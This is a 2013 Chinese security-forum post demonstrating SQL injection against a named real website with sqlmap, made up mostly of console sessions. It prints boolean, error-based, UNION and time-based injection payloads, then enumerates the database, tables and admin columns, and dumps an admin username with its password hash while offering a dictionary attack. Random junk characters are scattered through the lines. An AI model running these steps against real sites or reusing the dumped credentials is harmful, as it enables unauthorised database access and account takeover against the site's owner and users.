找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2310|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db8 h, y7 l  p: U6 d$ U
ms "Mysql" --current-user       /*  注解:获取当前用户名称
% {, j0 J; c5 H    sqlmap/0.9 - automatic SQL injection and database takeover tool3 ^* w' w; G7 v5 R  {$ e
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    " T$ N- b9 I( M[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : ]7 Y, ~* P- {( h4 r session file
    3 Q* O- C  p5 |3 K3 h[16:53:54] [INFO] resuming injection data from session file" F+ q* h* ~7 W5 r
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    2 T5 S$ @2 I! `+ Q6 c* R[16:53:54] [INFO] testing connection to the target url
    0 u1 B1 _1 g% q2 S6 ^9 G/ |3 G3 jsqlmap identified the following injection points with a total of 0 HTTP(s) reque5 q9 D1 f" O8 F/ X7 N) |
    sts:0 V1 g9 W! h1 h" B" Q$ J: z
    ---
    ! p4 h7 P$ v) X( ?9 @Place: GET( S8 F6 B& J. P" C" P
    Parameter: id
    + V; q; D, Z% W' s    Type: boolean-based blind9 L# R" W2 e6 {) o5 _( {; {* e9 x+ B
        Title: AND boolean-based blind - WHERE or HAVING clause
    0 y" o  _2 |  ]+ ]    Payload: id=276 AND 799=799
    3 R$ ]8 @8 K$ P, y0 r' k+ u) l    Type: error-based
    9 J' s/ O) [" h2 e% w2 D+ t    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    # n4 ]# ]0 N. \. f    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    9 i( @" ~8 b% L120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( V8 F% [# N  Z- @8 u, B
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); U  l9 n" A# S& u% z+ Y+ R
        Type: UNION query
    6 R; c6 E3 b3 \' `% I% O    Title: MySQL UNION query (NULL) - 1 to 10 columns4 z- e* b  h/ l; X. Z6 o* k3 V/ |- b
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    , z% \. V: F* h$ r' U(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # C4 s9 E2 p( @CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 x, C  A8 s( `$ F4 X; L
        Type: AND/OR time-based blind4 m# L$ U" l5 X% Q, e
        Title: MySQL > 5.0.11 AND time-based blind
    4 C: r3 C" K& }1 \) E" p    Payload: id=276 AND SLEEP(5)
    / v4 k8 p5 |* o& f$ t  f---
    7 @. x+ B9 a, y2 j0 M/ a[16:53:55] [INFO] the back-end DBMS is MySQL
    4 H, N6 M7 a# p8 |: `; q* ^web server operating system: Windows+ L; p/ \6 z0 u6 \+ `
    web application technology: Apache 2.2.11, PHP 5.3.05 T9 I- a$ V3 N- u+ _/ H
    back-end DBMS: MySQL 5.0. w6 m/ p7 y; T4 c
    [16:53:55] [INFO] fetching current user
    8 U5 E1 P( n) d! pcurrent user:    'root@localhost'   
    3 o4 C8 t" U- [7 h[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou& G2 a" Y/ \) [  e
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58' R) T% }% \2 Z/ v5 M1 n4 G+ z" Z
    " R+ Q! O* J* i: d# r+ k
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    2 k# E0 `7 P4 q, E& Q2 S- Lms "Mysql" --current-db                  /*当前数据库' C  q+ k& P( |( N
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    / b7 }: U0 J3 V( L    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    % ^" e; V" g) H/ r[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    ; l2 E5 g& |) a3 n5 B6 M$ _4 j7 T session file
      ?/ {9 b, j* |/ _! v[16:54:16] [INFO] resuming injection data from session file
    2 X$ {  z1 z" k, z5 M[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    , Y+ G1 d3 h4 J2 Q+ O! A9 }7 n0 A[16:54:16] [INFO] testing connection to the target url
    8 @* m6 Z0 o1 J2 }; e) F" Csqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 J4 p, Z% x( Z9 ysts:
    ! t4 O, O; X' T8 S* V$ X4 X8 g) B---, ^9 {- |& f% K3 y( B2 H
    Place: GET% o9 d$ {- o- S
    Parameter: id
    9 N/ G: {; }/ Z1 V0 J/ O( M    Type: boolean-based blind
      W1 i8 W8 P" a2 x+ C- Y    Title: AND boolean-based blind - WHERE or HAVING clause
    ; o  ?$ S* O  Q/ J/ r    Payload: id=276 AND 799=799
    + o( G8 ^2 @6 r    Type: error-based
    ' {* O  U8 w1 s4 H. @- S    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: I, I  ?/ w' b7 W5 y: S
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    % u# I. R/ m( ~2 C  s5 J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    1 n9 N- x) H; [1 P3 K( p6 w- |),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)  U4 S& O* L. ]  N6 ^1 v  T
        Type: UNION query
    2 V+ ~7 o; U3 h+ Y( n+ }    Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 A* w& u+ k0 X, I    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    & q  j# o2 V) v; f) G+ a. `1 R' ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 A) _) W) n+ Q1 H/ {: }; ?
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" ]$ I& Y) O" ?& ?
        Type: AND/OR time-based blind0 v/ F. n% v  g- ^7 l. }$ }3 m, e
        Title: MySQL > 5.0.11 AND time-based blind
    * A" m$ k3 Y- s, y7 T& h    Payload: id=276 AND SLEEP(5)( K; \' M& s' e5 N6 F
    ---) D4 R/ w3 X2 D: b9 b
    [16:54:17] [INFO] the back-end DBMS is MySQL8 Z' f* G" g+ f+ {
    web server operating system: Windows+ {9 `  U) }' n* e- u
    web application technology: Apache 2.2.11, PHP 5.3.07 Z8 i2 m  A& j. e3 h
    back-end DBMS: MySQL 5.0! X/ U; q; L7 \$ Q
    [16:54:17] [INFO] fetching current database! E8 x. f( t; v% @4 ~$ W
    current database:    'wepost'
    1 [( t% D( F2 R$ H7 p9 K3 V[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    3 c! h- ?- Y7 u& `+ ^1 Otput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    6 g! \3 s! r2 t/ h, @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    8 z* }5 N: m* d( e( kms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    8 B9 T- ?9 Q: K: n3 W9 @- {    sqlmap/0.9 - automatic SQL injection and database takeover tool
    7 f  ^& d/ Q9 V* T4 W& C1 x6 J    http://sqlmap.sourceforge.net
  • starting at: 16:55:251 t: r/ v1 j. }3 M$ n/ H
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as, }  G, l- W* W' `5 Q6 _' z- d
    session file" w9 h! P9 w+ s# |3 v( i
    [16:55:25] [INFO] resuming injection data from session file
    # P/ k6 ]2 z! P7 Z* }8 W/ q0 w, y: w[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    & N; \" z( t5 |/ L) Y& O[16:55:25] [INFO] testing connection to the target url8 ]: v8 }9 i$ ?( S/ l  n7 o4 {- H
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 Y6 h- y( g) Z
    sts:
    5 B; \8 k3 N& U$ H/ {$ f---! U( K" A# U6 r+ s
    Place: GET
    + u1 |* F3 r0 q. z7 |' E- xParameter: id5 y8 z* k& Y- O3 d2 W7 `
        Type: boolean-based blind3 {2 H! Z& w" h6 i  S- t
        Title: AND boolean-based blind - WHERE or HAVING clause6 c4 w. @; I' d+ D/ Y: y9 |
        Payload: id=276 AND 799=799
    7 u5 f+ p; \5 I  ^0 Q  Z4 S    Type: error-based
    - ?+ G+ L$ q% ^+ B% G" s( M    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    8 B6 J1 J% g4 L& e    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    - h/ ~" D: r, x" Z- e( M120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    % i; `2 d$ p+ w1 T" A3 b. B),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! z6 Z* l! Z& V' Q) h    Type: UNION query
    % ~% t* B3 R! z. g$ l    Title: MySQL UNION query (NULL) - 1 to 10 columns
    9 k7 c% v. j" K% {    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR' Z! {3 p) O+ Q2 V
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% I5 ^/ A0 d+ o; `0 @! d
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    4 a& }1 W$ b3 C/ s: j    Type: AND/OR time-based blind1 f5 ^, x: r# O. Q. a4 f2 O+ T
        Title: MySQL > 5.0.11 AND time-based blind
    $ c9 x% m1 j8 m) X. n7 {3 L    Payload: id=276 AND SLEEP(5)/ e! P, q* B2 @/ \; ]
    ---
    ) M& D# {6 W& T+ [' ?/ @. v[16:55:26] [INFO] the back-end DBMS is MySQL  F* s! u1 K* }5 J7 g5 c" s5 I8 D
    web server operating system: Windows
    1 Q" J- H+ o) a. Yweb application technology: Apache 2.2.11, PHP 5.3.0
    ' H, t0 [( A) u# i2 v1 Sback-end DBMS: MySQL 5.0
    $ h' ]1 r+ g- n# G/ |2 ~[16:55:26] [INFO] fetching tables for database 'wepost'
    " ?1 T7 O# `! }[16:55:27] [INFO] the SQL query used returns 6 entries
    - d' W( D: J8 j/ Y4 ?: o: o4 zDatabase: wepost2 C* V9 \7 q9 a2 V  W7 X$ f+ b
    [6 tables]2 S. K* u' B8 A* ?
    +-------------+; C/ O8 h& X" k. e4 A5 h0 a  l- @
    | admin       |
    " L& f9 n  A: S: j4 l| article     |1 z& G: T* k( @$ O4 C4 B
    | contributor |, n0 n6 q3 R0 B
    | idea        |
    + `8 |3 k/ p' T6 ?; E7 P4 O| image       |
    $ B9 D2 ?0 T2 b| issue       |
    : y0 k) v7 U+ P) M1 P, [; j. \+-------------+
    ; H3 E1 w* c4 s8 j. W4 a[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ' ~; B$ x6 \5 J  Dtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    - T; S$ T0 A$ T. M7 ~8 D. K; ?" F. t7 e+ G* z% q
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    0 i0 r" H8 R4 g# V( lms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    1 B+ o$ }+ k) x( ~* D3 U, @    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ) f) E  H1 S* n: Q6 c$ A    http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    & R, v: j6 a8 Q3 I! wsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ [0 F2 L( R4 w% {
    sts:
    3 \( R) e+ @5 c; V* r5 q1 x---1 a* q1 i" {7 p/ E% j
    Place: GET
      N! W* `/ A$ t' \  I8 `9 ]; Q: @9 [Parameter: id3 C% O, L- L7 y0 J$ s1 U) J8 R; D( e
        Type: boolean-based blind, e$ h4 n7 F6 Z, o
        Title: AND boolean-based blind - WHERE or HAVING clause  H5 `, ^+ x$ ^3 \! \. H6 i
        Payload: id=276 AND 799=799
    ) Q; d/ @; M1 G$ m6 R    Type: error-based  ?' r0 O: d7 a5 s. |5 H
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& Q$ k3 Y5 L9 [. G+ w$ {6 Q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," w/ w4 M  G/ f" V9 q7 s
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( m; B; F" J% B6 w+ B: a
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)* B$ m1 {; e  K+ S
        Type: UNION query) b5 [" ?1 c! a( Q/ r; i- U; R9 ~
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    , b3 y0 ^: ]) W" N9 {+ S    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* `: Q$ q" H: v0 S! z( i
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* j8 |/ r! @  |- v. M
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, d& i" G3 w) {$ F% e
        Type: AND/OR time-based blind
    0 i9 X) Z" y1 a3 m% n    Title: MySQL > 5.0.11 AND time-based blind2 l# [6 L* y6 ~  M6 B) f) @
        Payload: id=276 AND SLEEP(5)9 n- S+ c7 K! p; M4 j2 O& [
    ---( K. S5 j1 ~0 K2 h( ~2 _. V
    web server operating system: Windows( @! Y# _2 f' e  D, K( P$ h
    web application technology: Apache 2.2.11, PHP 5.3.0
    , f; R6 s3 G6 \1 j! ~+ }# t/ T  pback-end DBMS: MySQL 5.0
    8 |& s% L- J& o+ s[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    2 v8 M$ ^5 z, z1 Mssion': wepost, wepost
    1 z9 p. u. G! ^5 cDatabase: wepost6 W# V, J. G. N! `
    Table: admin  U; Y% O$ p) m% ~6 ~& [1 E# b
    [4 columns]
    ! r# _/ ~$ u: n3 _3 q2 f! \+----------+-------------+
    4 S; }! i" \- s| Column   | Type        |
    # X: L' ~! W8 t+----------+-------------+1 L+ w0 k' p  x2 M  Q8 A' H
    | id       | int(11)     |* N8 i) L/ K. H' ^# z/ j% ~6 `' `
    | password | varchar(32) |5 ?, `. t! o2 O6 N6 R% e$ j
    | type     | varchar(10) |
    / _' V2 r# Q  [0 F+ }5 k/ A, U0 _| userid   | varchar(20) |
    / _  z. }  t5 {5 a4 g$ J+----------+-------------+
    5 g# R, r$ W4 i3 ^
  • shutting down at: 16:56:19
    3 T+ T$ \, k# l5 U( P4 i3 d3 j+ d3 Q7 H! t1 r
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 i6 B" O0 P: d8 b* C# b- x
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容3 Q9 V; k6 }0 H" e
        sqlmap/0.9 - automatic SQL injection and database takeover tool0 U/ w5 E. c( t% @9 y% d
        http://sqlmap.sourceforge.net
  • starting at: 16:57:143 }) g6 x8 d0 C
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque8 x) ~4 }$ D2 B% V: P
    sts:
    / D* [/ O6 [4 |7 s) |9 w---+ X2 r9 }4 ], |5 m7 F, L
    Place: GET# c" k" n" c& `# t% A
    Parameter: id
    , V( d( H9 ~9 \& `    Type: boolean-based blind
    " d+ p9 n5 ?; k    Title: AND boolean-based blind - WHERE or HAVING clause
    : ~5 Y, ?8 i  [) D- i    Payload: id=276 AND 799=799
    2 ~- W) `9 a& j; d    Type: error-based
    6 a9 J( s' a2 d% S    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause0 o' [5 w5 O& W3 J# i# A+ T4 I$ e
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 O4 {$ F) A- `6 L) g$ ^
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / W" @9 S' I" a+ Q1 ?8 u4 q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ l* x$ A6 ^3 x0 y1 F
        Type: UNION query3 {. x. R0 x! y( I
        Title: MySQL UNION query (NULL) - 1 to 10 columns/ m& ~1 W" }. N: Z* ?
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    + E; J# x! F4 Y$ |' Y- T; f8 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : `8 h" `# A# l2 a; G! TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    - T+ A2 a' E! m& I    Type: AND/OR time-based blind' H' {4 \- [( Y7 m* S7 T% \
        Title: MySQL > 5.0.11 AND time-based blind
    0 K0 y4 L. @. w4 t! Z/ E8 T    Payload: id=276 AND SLEEP(5)
    8 i  a, }" ]. N; |! o9 I---
    3 r% E1 F2 C- m3 ?6 e  ]! F8 sweb server operating system: Windows
    , p! H- v/ N; E  ]; e5 v# vweb application technology: Apache 2.2.11, PHP 5.3.0
    3 b0 h7 ^, r& N; R, O8 Uback-end DBMS: MySQL 5.0
    # D! |0 ^- _' C4 F1 y7 L0 ]" d; `recognized possible password hash values. do you want to use dictionary attack o' o7 w  _- n+ e6 y! t4 t
    n retrieved table items? [Y/n/q] y0 G4 q1 d5 Q' @
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]* D0 P0 j5 g0 A  t) P! ~8 E, W; j& h
    do you want to use common password suffixes? (slow!) [y/N] y9 P' l* _7 |1 D* T0 k6 J+ W
    Database: wepost
    , h; e  b$ U( l4 C$ n- XTable: admin( R8 F. ~# {4 z* c' G
    [1 entry]9 y. k3 a+ S- w& P/ h
    +----------------------------------+------------+
    4 f! M# ?3 @  q6 O9 P: U, C4 P| password                         | userid     |# {! S' ~% h% D! ]
    +----------------------------------+------------+
    # i4 |# C  _) K7 Y9 g: C| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* s2 R; s% t7 J7 |9 d& g
    +----------------------------------+------------+* D2 ^- }* R- B7 v% W( N0 G" ?
  • shutting down at: 16:58:14
    . M3 [: g/ @; {7 x% x7 }7 K1 z8 i2 Y) ]+ e
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表